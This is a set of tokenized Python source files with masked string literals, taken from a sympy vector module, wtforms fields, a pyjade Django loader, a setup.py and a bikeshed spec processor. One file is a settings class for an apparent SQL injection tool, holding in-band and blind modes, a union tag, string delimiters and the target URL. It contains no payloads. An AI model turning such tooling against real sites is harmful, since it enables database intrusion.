args . append ( ( v1 * v2 ) * BaseDyadic ( k1 , k2 ) ) <EOL> return DyadicAdd ( * args ) <EOL> def projection ( self , other , scalar = False ) : <EOL> """<STR_LIT>""" <EOL> if self . equals ( Vector . zero ) : <EOL> return S . zero if scalar else Vector . zero <EOL> if scalar : <EOL> return self . dot ( other ) / self . dot ( self ) <EOL> else : <EOL> return self . dot ( other ) / self . 
dot ( self ) * self <EOL> def __or__ ( self , other ) : <EOL> return self . outer ( other ) <EOL> __or__ . __doc__ = outer . __doc__ <EOL> def to_matrix ( self , system ) : <EOL> """<STR_LIT>""" <EOL> return Matrix ( [ self . dot ( unit_vec ) for unit_vec in <EOL> system . base_vectors ( ) ] ) <EOL> def separate ( self ) : <EOL> """<STR_LIT>""" <EOL> parts = { } <EOL> for vect , measure in self . components . items ( ) : <EOL> parts [ vect . system ] = ( parts . get ( vect . system , Vector . zero ) + <EOL> vect * measure ) <EOL> return parts <EOL> class BaseVector ( Vector , AtomicExpr ) : <EOL> """<STR_LIT>""" <EOL> def __new__ ( cls , name , index , system , pretty_str , latex_str ) : <EOL> name = str ( name ) <EOL> pretty_str = str ( pretty_str ) <EOL> latex_str = str ( latex_str ) <EOL> if index not in range ( <NUM_LIT:0> , <NUM_LIT:3> ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if not isinstance ( system , CoordSysCartesian ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> obj = super ( BaseVector , cls ) . __new__ ( cls , Symbol ( name ) , S ( index ) , <EOL> system , Symbol ( pretty_str ) , <EOL> Symbol ( latex_str ) ) <EOL> obj . _base_instance = obj <EOL> obj . _components = { obj : S ( <NUM_LIT:1> ) } <EOL> obj . _measure_number = S ( <NUM_LIT:1> ) <EOL> obj . _name = name <EOL> obj . _pretty_form = u ( pretty_str ) <EOL> obj . _latex_form = latex_str <EOL> obj . _system = system <EOL> assumptions = { '<STR_LIT>' : True } <EOL> obj . _assumptions = StdFactKB ( assumptions ) <EOL> obj . _sys = system <EOL> return obj <EOL> @ property <EOL> def system ( self ) : <EOL> return self . _system <EOL> def __str__ ( self , printer = None ) : <EOL> return self . _name <EOL> @ property <EOL> def free_symbols ( self ) : <EOL> return { self } <EOL> __repr__ = __str__ <EOL> _sympystr = __str__ <EOL> class VectorAdd ( BasisDependentAdd , Vector ) : <EOL> """<STR_LIT>""" <EOL> def __new__ ( cls , * args , ** options ) : <EOL> obj = BasisDependentAdd . 
__new__ ( cls , * args , ** options ) <EOL> return obj <EOL> def __str__ ( self , printer = None ) : <EOL> ret_str = '<STR_LIT>' <EOL> items = list ( self . separate ( ) . items ( ) ) <EOL> items . sort ( key = lambda x : x [ <NUM_LIT:0> ] . __str__ ( ) ) <EOL> for system , vect in items : <EOL> base_vects = system . base_vectors ( ) <EOL> for x in base_vects : <EOL> if x in vect . components : <EOL> temp_vect = self . components [ x ] * x <EOL> ret_str += temp_vect . __str__ ( printer ) + "<STR_LIT>" <EOL> return ret_str [ : - <NUM_LIT:3> ] <EOL> __repr__ = __str__ <EOL> _sympystr = __str__ <EOL> class VectorMul ( BasisDependentMul , Vector ) : <EOL> """<STR_LIT>""" <EOL> def __new__ ( cls , * args , ** options ) : <EOL> obj = BasisDependentMul . __new__ ( cls , * args , ** options ) <EOL> return obj <EOL> @ property <EOL> def base_vector ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _base_instance <EOL> @ property <EOL> def measure_number ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _measure_number <EOL> class VectorZero ( BasisDependentZero , Vector ) : <EOL> """<STR_LIT>""" <EOL> _op_priority = <NUM_LIT> <EOL> _pretty_form = u'<STR_LIT:0>' <EOL> _latex_form = '<STR_LIT>' <EOL> def __new__ ( cls ) : <EOL> obj = BasisDependentZero . __new__ ( cls ) <EOL> return obj <EOL> def _vect_div ( one , other ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( one , Vector ) and isinstance ( other , Vector ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> elif isinstance ( one , Vector ) : <EOL> if other == S . Zero : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> return VectorMul ( one , Pow ( other , S . NegativeOne ) ) <EOL> else : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> Vector . _expr_type = Vector <EOL> Vector . _mul_func = VectorMul <EOL> Vector . _add_func = VectorAdd <EOL> Vector . _zero_func = VectorZero <EOL> Vector . _base_func = BaseVector <EOL> Vector . _div_helper = _vect_div <EOL> Vector . zero = VectorZero ( ) </s>
<s> """<STR_LIT>""" <EOL> import operator <EOL> from wtforms import widgets <EOL> from wtforms . fields import SelectFieldBase , FieldList <EOL> from wtforms . validators import ValidationError <EOL> from wtforms . widgets import TextInput <EOL> __all__ = ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> class QuerySelectField ( SelectFieldBase ) : <EOL> """<STR_LIT>""" <EOL> widget = widgets . Select ( ) <EOL> def __init__ ( self , label = None , validators = None , query_factory = None , <EOL> get_label = None , allow_blank = False , <EOL> blank_text = '<STR_LIT>' , ** kwargs ) : <EOL> super ( QuerySelectField , self ) . __init__ ( label , validators , ** kwargs ) <EOL> self . query_factory = query_factory <EOL> self . get_pk = lambda x : x . id <EOL> if get_label is None : <EOL> self . get_label = lambda x : x <EOL> elif isinstance ( get_label , ( str , basestring ) ) : <EOL> self . get_label = operator . attrgetter ( get_label ) <EOL> else : <EOL> self . get_label = get_label <EOL> self . allow_blank = allow_blank <EOL> self . blank_text = blank_text <EOL> self . query = None <EOL> self . _object_list = None <EOL> def _get_data ( self ) : <EOL> if self . _formdata is not None : <EOL> for pk , obj in self . _get_object_list ( ) : <EOL> if pk == self . _formdata : <EOL> self . _set_data ( obj ) <EOL> break <EOL> return self . _data <EOL> def _set_data ( self , data ) : <EOL> self . _data = data <EOL> self . _formdata = None <EOL> data = property ( _get_data , _set_data ) <EOL> def _get_object_list ( self ) : <EOL> if not self . query_factory : <EOL> return [ ] <EOL> self . query_factory . rewind ( ) <EOL> if self . _object_list is None : <EOL> query = self . query_factory <EOL> get_pk = self . get_pk <EOL> self . _object_list = list ( ( str ( get_pk ( obj ) ) , obj ) for obj in query ) <EOL> return self . _object_list <EOL> def iter_choices ( self ) : <EOL> if self . allow_blank : <EOL> yield ( '<STR_LIT>' , self . 
blank_text , self . data is None ) <EOL> for pk , obj in self . _get_object_list ( ) : <EOL> yield ( pk , self . get_label ( obj ) , obj == self . data ) <EOL> def process_formdata ( self , valuelist ) : <EOL> if valuelist : <EOL> if self . allow_blank and valuelist [ <NUM_LIT:0> ] == '<STR_LIT>' : <EOL> self . data = None <EOL> else : <EOL> self . _data = None <EOL> self . _formdata = valuelist [ <NUM_LIT:0> ] <EOL> def pre_validate ( self , form ) : <EOL> if not self . allow_blank or self . data is not None : <EOL> for pk , obj in self . _get_object_list ( ) : <EOL> if self . data == obj : <EOL> break <EOL> else : <EOL> raise ValidationError ( self . gettext ( '<STR_LIT>' ) ) <EOL> class QuerySelectMultipleField ( QuerySelectField ) : <EOL> """<STR_LIT>""" <EOL> widget = widgets . Select ( multiple = True ) <EOL> def __init__ ( self , label = None , validators = None , default = None , ** kwargs ) : <EOL> if default is None : <EOL> default = [ ] <EOL> super ( QuerySelectMultipleField , self ) . __init__ ( label , validators , <EOL> default = default , ** kwargs ) <EOL> self . _invalid_formdata = False <EOL> def _get_data ( self ) : <EOL> formdata = self . _formdata <EOL> if formdata is not None : <EOL> data = [ ] <EOL> for pk , obj in self . _get_object_list ( ) : <EOL> if not formdata : <EOL> break <EOL> elif pk in formdata : <EOL> formdata . remove ( pk ) <EOL> data . append ( obj ) <EOL> if formdata : <EOL> self . _invalid_formdata = True <EOL> self . _set_data ( data ) <EOL> return self . _data <EOL> def _set_data ( self , data ) : <EOL> self . _data = data <EOL> self . _formdata = None <EOL> data = property ( _get_data , _set_data ) <EOL> def iter_choices ( self ) : <EOL> for pk , obj in self . _get_object_list ( ) : <EOL> yield ( pk , self . get_label ( obj ) , obj in self . data ) <EOL> def process_formdata ( self , valuelist ) : <EOL> self . _formdata = set ( valuelist ) <EOL> def pre_validate ( self , form ) : <EOL> if self . 
_invalid_formdata : <EOL> raise ValidationError ( self . gettext ( '<STR_LIT>' ) ) <EOL> elif self . data : <EOL> obj_list = list ( x [ <NUM_LIT:1> ] for x in self . _get_object_list ( ) ) <EOL> for v in self . data : <EOL> if v not in obj_list : <EOL> raise ValidationError ( self . gettext ( '<STR_LIT>' ) ) <EOL> def get_pk_from_identity ( obj ) : <EOL> cls , key = identity_key ( instance = obj ) <EOL> return '<STR_LIT::>' . join ( str ( x ) for x in key ) <EOL> class ModelSelectField ( QuerySelectField ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , label = u'<STR_LIT>' , validators = None , model = None , ** kwargs ) : <EOL> super ( ModelSelectField , self ) . __init__ ( label , validators , <EOL> query_factory = model . objects , ** kwargs ) <EOL> class ModelSelectMultipleField ( QuerySelectMultipleField ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , label = u'<STR_LIT>' , validators = None , model = None , ** kwargs ) : <EOL> super ( ModelSelectMultipleField , self ) . __init__ ( label , validators , <EOL> query_factory = model . objects , ** kwargs ) <EOL> class ListField ( FieldList ) : <EOL> def new_generic ( self ) : <EOL> assert not self . max_entries or len ( self . entries ) < self . max_entries , '<STR_LIT>' <EOL> new_index = '<STR_LIT>' <EOL> name = '<STR_LIT>' % ( self . short_name , new_index ) <EOL> id = '<STR_LIT>' % ( self . id , new_index ) <EOL> field = self . unbound_field . bind ( form = None , name = name , <EOL> prefix = self . _prefix , id = id ) <EOL> field . process ( None , None ) <EOL> return field <EOL> class AutocompleteInput ( TextInput ) : <EOL> def __call__ ( self , field , ** kwargs ) : <EOL> autocomplete_value = kwargs . get ( '<STR_LIT:value>' , field . _value ( ) ) <EOL> kwargs [ '<STR_LIT:value>' ] = '<STR_LIT>' <EOL> kwargs [ '<STR_LIT>' ] = autocomplete_value <EOL> return super ( AutocompleteInput , self ) . __call__ ( field , ** kwargs ) </s>
<s> from __future__ import absolute_import <EOL> import hashlib <EOL> from django . template . base import Template <EOL> try : <EOL> from django . template . exceptions import TemplateDoesNotExist <EOL> except ImportError : <EOL> from django . template . base import TemplateDoesNotExist <EOL> from django . template . loader import BaseLoader <EOL> try : <EOL> from django . template . engine import Engine <EOL> except ImportError : <EOL> pass <EOL> import os <EOL> from django . conf import settings <EOL> from . compiler import Compiler <EOL> from pyjade . utils import process <EOL> try : <EOL> from django . template . loader import make_origin <EOL> except ImportError : <EOL> try : <EOL> from django . template import Origin <EOL> def make_origin ( display_name , loader , name , dirs ) : <EOL> return Origin ( <EOL> name = display_name , <EOL> template_name = name , <EOL> loader = loader , <EOL> ) <EOL> except ImportError : <EOL> make_origin = Engine . get_default ( ) . make_origin <EOL> class Loader ( BaseLoader ) : <EOL> is_usable = True <EOL> def __init__ ( self , loaders ) : <EOL> self . template_cache = { } <EOL> self . _loaders = loaders <EOL> self . _cached_loaders = [ ] <EOL> try : <EOL> from django . template . loader import find_template_loader as _find_template_loader <EOL> except : <EOL> _find_template_loader = Engine . get_default ( ) . find_template_loader <EOL> self . _find_template_loader = _find_template_loader <EOL> @ property <EOL> def loaders ( self ) : <EOL> if not self . _cached_loaders : <EOL> cached_loaders = [ ] <EOL> for loader in self . _loaders : <EOL> cached_loaders . append ( self . _find_template_loader ( loader ) ) <EOL> self . _cached_loaders = cached_loaders <EOL> return self . _cached_loaders <EOL> def find_template ( self , name , dirs = None ) : <EOL> for loader in self . 
loaders : <EOL> try : <EOL> template , display_name = loader ( name , dirs ) <EOL> return ( template , make_origin ( display_name , loader , <EOL> name , dirs ) ) <EOL> except TemplateDoesNotExist : <EOL> pass <EOL> raise TemplateDoesNotExist ( name ) <EOL> def load_template_source ( self , template_name , template_dirs = None ) : <EOL> for loader in self . loaders : <EOL> try : <EOL> return loader . load_template_source ( template_name , <EOL> template_dirs ) <EOL> except TemplateDoesNotExist : <EOL> pass <EOL> raise TemplateDoesNotExist ( template_name ) <EOL> def load_template ( self , template_name , template_dirs = None ) : <EOL> key = template_name <EOL> if template_dirs : <EOL> key = '<STR_LIT:->' . join ( [ template_name , hashlib . sha1 ( '<STR_LIT:|>' . join ( template_dirs ) ) . hexdigest ( ) ] ) <EOL> if settings . DEBUG or key not in self . template_cache : <EOL> if os . path . splitext ( template_name ) [ <NUM_LIT:1> ] in ( '<STR_LIT>' , ) : <EOL> try : <EOL> source , display_name = self . load_template_source ( template_name , template_dirs ) <EOL> source = process ( source , filename = template_name , compiler = Compiler ) <EOL> origin = make_origin ( display_name , self . load_template_source , template_name , template_dirs ) <EOL> template = Template ( source , origin , template_name ) <EOL> except NotImplementedError : <EOL> template , origin = self . find_template ( template_name , template_dirs ) <EOL> else : <EOL> template , origin = self . find_template ( template_name , template_dirs ) <EOL> if not hasattr ( template , '<STR_LIT>' ) : <EOL> try : <EOL> template = Template ( process ( source , filename = template_name , compiler = Compiler ) , origin , template_name ) <EOL> except ( TemplateDoesNotExist , UnboundLocalError ) : <EOL> return template , origin <EOL> self . template_cache [ key ] = template <EOL> return self . template_cache [ key ] , None <EOL> def reset ( self ) : <EOL> "<STR_LIT>" <EOL> self . template_cache . clear ( ) </s>
<s> """<STR_LIT>""" <EOL> from random import choice <EOL> class Context : <EOL> """<STR_LIT>""" <EOL> FIELD_STR = '<STR_LIT:string>' <EOL> FIELD_INT = '<STR_LIT:int>' <EOL> INBAND = '<STR_LIT>' <EOL> BLIND = '<STR_LIT>' <EOL> def __init__ ( self , method = INBAND , field_type = FIELD_STR , url = '<STR_LIT>' , <EOL> params = None , target = None , comment = '<STR_LIT>' , strdelim = "<STR_LIT:'>" , union_tag = None , <EOL> union_fields = ( ) , default = '<STR_LIT:0>' , union_target = - <NUM_LIT:1> , use_ssl = False , <EOL> smooth = False , headers = None , cookie = None , multithread = True , <EOL> truncate = False , encode_str = False ) : <EOL> '''<STR_LIT>''' <EOL> self . __method = method <EOL> self . __url = url <EOL> self . __params = params <EOL> self . __target = target <EOL> self . __comment = comment <EOL> self . __str_delim = strdelim <EOL> self . __default = default <EOL> self . __use_ssl = use_ssl <EOL> self . __encode_str = encode_str <EOL> self . __truncate = truncate <EOL> self . __field_type = field_type <EOL> self . __smooth = smooth <EOL> self . __headers = headers <EOL> self . __cookie = cookie <EOL> self . __multithread = multithread <EOL> self . __union_fields = union_fields <EOL> self . __union_target = union_target <EOL> if union_tag is not None : <EOL> self . __union_tag = union_tag <EOL> else : <EOL> self . __union_tag = '<STR_LIT>' . join ( [ choice ( '<STR_LIT>' ) for i in range ( <NUM_LIT:32> ) ] ) <EOL> def get_url ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __url <EOL> def set_url ( self , url ) : <EOL> """<STR_LIT>""" <EOL> self . __url = url <EOL> def set_field_type ( self , field_type ) : <EOL> """<STR_LIT>""" <EOL> self . __field_type = field_type <EOL> def get_field_type ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __field_type <EOL> def enable_string_encoding ( self , enabled ) : <EOL> """<STR_LIT>""" <EOL> self . 
__encode_str = enabled <EOL> def enable_truncate ( self , enabled ) : <EOL> """<STR_LIT>""" <EOL> self . __truncate = enabled <EOL> def require_truncate ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __truncate <EOL> def require_string_encoding ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __encode_str <EOL> def enable_ssl ( self , enabled ) : <EOL> """<STR_LIT>""" <EOL> self . __use_ssl = enabled <EOL> def use_ssl ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __use_ssl <EOL> def set_smooth ( self , enabled = True ) : <EOL> """<STR_LIT>""" <EOL> self . __smooth = enabled <EOL> def is_smooth ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __smooth <EOL> def set_multithread ( self , enabled = True ) : <EOL> """<STR_LIT>""" <EOL> self . __multithread = enabled <EOL> def is_multithread ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __multithread <EOL> def has_headers ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __headers is not None <EOL> def set_headers ( self , headers ) : <EOL> """<STR_LIT>""" <EOL> self . __headers = headers <EOL> def set_header ( self , header , value ) : <EOL> """<STR_LIT>""" <EOL> if self . __headers is not None : <EOL> self . __headers [ header ] = value <EOL> else : <EOL> self . __headers = { header : value } <EOL> def get_headers ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __headers <EOL> def set_cookie ( self , cookie ) : <EOL> """<STR_LIT>""" <EOL> self . __cookie = cookie <EOL> def get_cookie ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __cookie <EOL> def set_params ( self , params , target = None ) : <EOL> """<STR_LIT>""" <EOL> self . __params = params <EOL> self . __target = target <EOL> def get_params ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __params <EOL> def get_target_param ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __target <EOL> def get_comment ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . 
__comment <EOL> def set_comment ( self , comment ) : <EOL> """<STR_LIT>""" <EOL> self . __comment = comment <EOL> def get_string_delimiter ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __str_delim <EOL> def set_string_delimiter ( self , delim ) : <EOL> """<STR_LIT>""" <EOL> self . __str_delim = delim <EOL> def set_default_value ( self , default ) : <EOL> """<STR_LIT>""" <EOL> self . __default = default <EOL> def get_default_value ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __default <EOL> def set_inband_fields ( self , fields ) : <EOL> """<STR_LIT>""" <EOL> self . __union_fields = fields <EOL> def get_inband_fields ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __union_fields <EOL> def get_inband_tag ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __union_tag <EOL> def set_inband_target ( self , target ) : <EOL> """<STR_LIT>""" <EOL> self . __union_target = int ( target ) <EOL> def get_inband_target ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __union_target <EOL> def is_blind ( self ) : <EOL> """<STR_LIT>""" <EOL> return ( self . __method == Context . BLIND ) <EOL> def is_inband ( self ) : <EOL> """<STR_LIT>""" <EOL> return ( self . __method == Context . INBAND ) <EOL> def in_string ( self ) : <EOL> """<STR_LIT>""" <EOL> return ( self . __field_type == Context . FIELD_STR ) <EOL> def in_int ( self ) : <EOL> """<STR_LIT>""" <EOL> return ( self . __field_type == Context . FIELD_INT ) <EOL> def use_blind ( self ) : <EOL> """<STR_LIT>""" <EOL> self . __method = Context . BLIND <EOL> def use_inband ( self ) : <EOL> """<STR_LIT>""" <EOL> self . __method = Context . INBAND <EOL> class InbandContext ( Context ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ** kwargs ) : <EOL> kwargs [ '<STR_LIT>' ] = Context . INBAND <EOL> Context . __init__ ( self , ** kwargs ) <EOL> class BlindContext ( Context ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ** kwargs ) : <EOL> kwargs [ '<STR_LIT>' ] = Context . BLIND <EOL> Context . 
__init__ ( self , ** kwargs ) </s>
<s> from setuptools import setup , find_packages <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] , <EOL> keywords = '<STR_LIT>' , <EOL> packages = find_packages ( exclude = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> install_requires = [ '<STR_LIT>' ] <EOL> ) </s>
<s> from __future__ import division , unicode_literals <EOL> import re <EOL> import json <EOL> import copy <EOL> from collections import OrderedDict , defaultdict <EOL> import config <EOL> import biblio <EOL> from . messages import * <EOL> from . htmlhelpers import * <EOL> def transformDataBlocks ( doc , lines ) : <EOL> inBlock = False <EOL> blockTypes = { <EOL> '<STR_LIT>' : transformPropdef , <EOL> '<STR_LIT>' : transformDescdef , <EOL> '<STR_LIT>' : transformElementdef , <EOL> '<STR_LIT>' : transformArgumentdef , <EOL> '<STR_LIT>' : transformRailroad , <EOL> '<STR_LIT>' : transformBiblio , <EOL> '<STR_LIT>' : transformAnchors , <EOL> '<STR_LIT>' : transformLinkDefaults , <EOL> '<STR_LIT>' : transformIgnoredSpecs , <EOL> '<STR_LIT:info>' : transformInfo , <EOL> '<STR_LIT>' : transformInclude , <EOL> '<STR_LIT>' : transformPre <EOL> } <EOL> blockType = "<STR_LIT>" <EOL> tagName = "<STR_LIT>" <EOL> startLine = <NUM_LIT:0> <EOL> newLines = [ ] <EOL> for ( i , line ) in enumerate ( lines ) : <EOL> match = re . match ( r"<STR_LIT>" , line , re . I ) <EOL> if match and not inBlock : <EOL> inBlock = True <EOL> startLine = i <EOL> tagName = match . group ( <NUM_LIT:1> ) <EOL> typeMatch = re . search ( "<STR_LIT:|>" . join ( blockTypes . keys ( ) ) , match . group ( <NUM_LIT:2> ) ) <EOL> if typeMatch : <EOL> blockType = typeMatch . group ( <NUM_LIT:0> ) <EOL> else : <EOL> blockType = "<STR_LIT>" <EOL> match = re . match ( r"<STR_LIT>" + tagName + "<STR_LIT>" , line , re . I ) <EOL> if match and inBlock : <EOL> inBlock = False <EOL> if startLine == i : <EOL> match = re . match ( r"<STR_LIT>" . format ( tagName ) , line , re . I ) <EOL> repl = blockTypes [ blockType ] ( <EOL> lines = [ match . group ( <NUM_LIT:2> ) ] , <EOL> tagName = tagName , <EOL> firstLine = match . group ( <NUM_LIT:1> ) , <EOL> doc = doc ) <EOL> newLines . extend ( repl ) <EOL> newLines . append ( "<STR_LIT>" . format ( - len ( repl ) - <NUM_LIT:1> ) ) <EOL> newLines . append ( match . 
group ( <NUM_LIT:3> ) ) <EOL> elif re . match ( r"<STR_LIT>" , match . group ( <NUM_LIT:1> ) ) : <EOL> repl = blockTypes [ blockType ] ( <EOL> lines = lines [ startLine + <NUM_LIT:1> : i ] , <EOL> tagName = tagName , <EOL> firstLine = lines [ startLine ] , <EOL> doc = doc ) <EOL> newLines . extend ( repl ) <EOL> newLines . append ( "<STR_LIT>" . format ( ( i - startLine ) - len ( repl ) - <NUM_LIT:1> ) ) <EOL> newLines . append ( match . group ( <NUM_LIT:2> ) ) <EOL> else : <EOL> repl = blockTypes [ blockType ] ( <EOL> lines = lines [ startLine + <NUM_LIT:1> : i ] + [ match . group ( <NUM_LIT:1> ) ] , <EOL> tagName = tagName , <EOL> firstLine = lines [ startLine ] , <EOL> doc = doc ) <EOL> newLines . extend ( repl ) <EOL> newLines . append ( "<STR_LIT>" . format ( ( i - startLine ) - len ( repl ) - <NUM_LIT:1> ) ) <EOL> newLines . append ( match . group ( <NUM_LIT:2> ) ) <EOL> tagName = "<STR_LIT>" <EOL> blockType = "<STR_LIT>" <EOL> continue <EOL> if inBlock : <EOL> continue <EOL> newLines . append ( line ) <EOL> return newLines <EOL> def transformPre ( lines , tagName , firstLine , ** kwargs ) : <EOL> if len ( lines ) == <NUM_LIT:0> : <EOL> return [ firstLine , "<STR_LIT>" . format ( tagName ) ] <EOL> if re . match ( r"<STR_LIT>" , lines [ - <NUM_LIT:1> ] ) : <EOL> lastLine = "<STR_LIT>" . format ( tagName ) <EOL> lines = lines [ : - <NUM_LIT:1> ] <EOL> else : <EOL> lastLine = "<STR_LIT>" . format ( tagName ) <EOL> if len ( lines ) == <NUM_LIT:0> : <EOL> return [ firstLine , lastLine ] <EOL> indent = float ( "<STR_LIT>" ) <EOL> for ( i , line ) in enumerate ( lines ) : <EOL> if line . strip ( ) == "<STR_LIT>" : <EOL> continue <EOL> lines [ i ] = lines [ i ] . replace ( "<STR_LIT:\t>" , "<STR_LIT:U+0020>" ) <EOL> indent = min ( indent , len ( re . match ( r"<STR_LIT>" , lines [ i ] ) . group ( <NUM_LIT:0> ) ) ) <EOL> if indent == float ( "<STR_LIT>" ) : <EOL> indent = <NUM_LIT:0> <EOL> for ( i , line ) in enumerate ( lines ) : <EOL> if line . 
strip ( ) == "<STR_LIT>" : <EOL> continue <EOL> lines [ i ] = lines [ i ] [ indent : ] <EOL> lines [ <NUM_LIT:0> ] = firstLine . rstrip ( ) + lines [ <NUM_LIT:0> ] <EOL> lines . append ( lastLine ) <EOL> return lines <EOL> def transformPropdef ( lines , doc , firstLine , ** kwargs ) : <EOL> attrs = OrderedDict ( ) <EOL> parsedAttrs = parseDefBlock ( lines , "<STR_LIT>" ) <EOL> forHint = "<STR_LIT>" <EOL> if "<STR_LIT:Name>" in parsedAttrs : <EOL> forHint = "<STR_LIT>" . format ( parsedAttrs [ "<STR_LIT:Name>" ] . split ( "<STR_LIT:U+002C>" ) [ <NUM_LIT:0> ] . strip ( ) ) <EOL> if "<STR_LIT>" in firstLine or "<STR_LIT>" in parsedAttrs : <EOL> attrs [ "<STR_LIT:Name>" ] = None <EOL> attrs [ "<STR_LIT>" ] = None <EOL> ret = [ "<STR_LIT>" . format ( forHint = forHint ) ] <EOL> elif "<STR_LIT>" in firstLine : <EOL> attrs [ "<STR_LIT:Name>" ] = None <EOL> attrs [ "<STR_LIT>" ] = None <EOL> for defaultKey in [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] : <EOL> attrs [ defaultKey ] = "<STR_LIT>" <EOL> ret = [ "<STR_LIT>" . format ( forHint = forHint ) ] <EOL> else : <EOL> attrs [ "<STR_LIT:Name>" ] = None <EOL> attrs [ "<STR_LIT>" ] = None <EOL> attrs [ "<STR_LIT>" ] = None <EOL> attrs [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> attrs [ "<STR_LIT>" ] = None <EOL> attrs [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> attrs [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> attrs [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> attrs [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> ret = [ "<STR_LIT>" . format ( forHint = forHint ) ] <EOL> for key , val in attrs . items ( ) : <EOL> if key in parsedAttrs or val is not None : <EOL> if key in parsedAttrs : <EOL> val = parsedAttrs [ key ] <EOL> if key in ( "<STR_LIT>" , "<STR_LIT>" ) : <EOL> ret . append ( "<STR_LIT>" . format ( key , val ) ) <EOL> elif key == "<STR_LIT>" and val . lower ( ) == "<STR_LIT>" : <EOL> ret . append ( "<STR_LIT>" ) <EOL> else : <EOL> ret . append ( "<STR_LIT>" . 
format ( key , val ) ) <EOL> else : <EOL> die ( "<STR_LIT>" , parsedAttrs . get ( "<STR_LIT:Name>" , "<STR_LIT>" ) , key ) <EOL> continue <EOL> for key , val in parsedAttrs . items ( ) : <EOL> if key in attrs : <EOL> continue <EOL> ret . append ( "<STR_LIT>" . format ( key , val ) ) <EOL> ret . append ( "<STR_LIT>" ) <EOL> return ret <EOL> def transformDescdef ( lines , doc , firstLine , ** kwargs ) : <EOL> vals = parseDefBlock ( lines , "<STR_LIT>" ) <EOL> if "<STR_LIT>" in firstLine or "<STR_LIT>" in vals : <EOL> requiredKeys = [ "<STR_LIT:Name>" , "<STR_LIT>" ] <EOL> ret = [ "<STR_LIT>" . format ( vals . get ( "<STR_LIT>" , "<STR_LIT>" ) ) ] <EOL> if "<STR_LIT>" in firstLine : <EOL> requiredKeys = [ "<STR_LIT:Name>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> ret = [ "<STR_LIT>" . format ( vals . get ( "<STR_LIT>" , "<STR_LIT>" ) ) ] <EOL> else : <EOL> requiredKeys = [ "<STR_LIT:Name>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> ret = [ "<STR_LIT>" . format ( vals . get ( "<STR_LIT>" , "<STR_LIT>" ) ) ] <EOL> for key in requiredKeys : <EOL> if key == "<STR_LIT>" : <EOL> ret . append ( "<STR_LIT>" . format ( key , vals . get ( key , '<STR_LIT>' ) ) ) <EOL> elif key == "<STR_LIT>" : <EOL> ret . append ( "<STR_LIT>" . format ( key , vals . get ( key , '<STR_LIT>' ) ) ) <EOL> elif key in vals : <EOL> ret . append ( "<STR_LIT>" . format ( key , vals . get ( key , '<STR_LIT>' ) ) ) <EOL> else : <EOL> die ( "<STR_LIT>" , vals . get ( "<STR_LIT:Name>" , "<STR_LIT>" ) , key ) <EOL> continue <EOL> for key in vals . viewkeys ( ) - requiredKeys : <EOL> ret . append ( "<STR_LIT>" . format ( key , vals [ key ] ) ) <EOL> ret . append ( "<STR_LIT>" ) <EOL> return ret <EOL> def transformElementdef ( lines , doc , ** kwargs ) : <EOL> attrs = OrderedDict ( ) <EOL> parsedAttrs = parseDefBlock ( lines , "<STR_LIT>" ) <EOL> if "<STR_LIT>" in parsedAttrs or "<STR_LIT>" in parsedAttrs : <EOL> html = "<STR_LIT>" <EOL> if "<STR_LIT>" in parsedAttrs : <EOL> groups = [ x . 
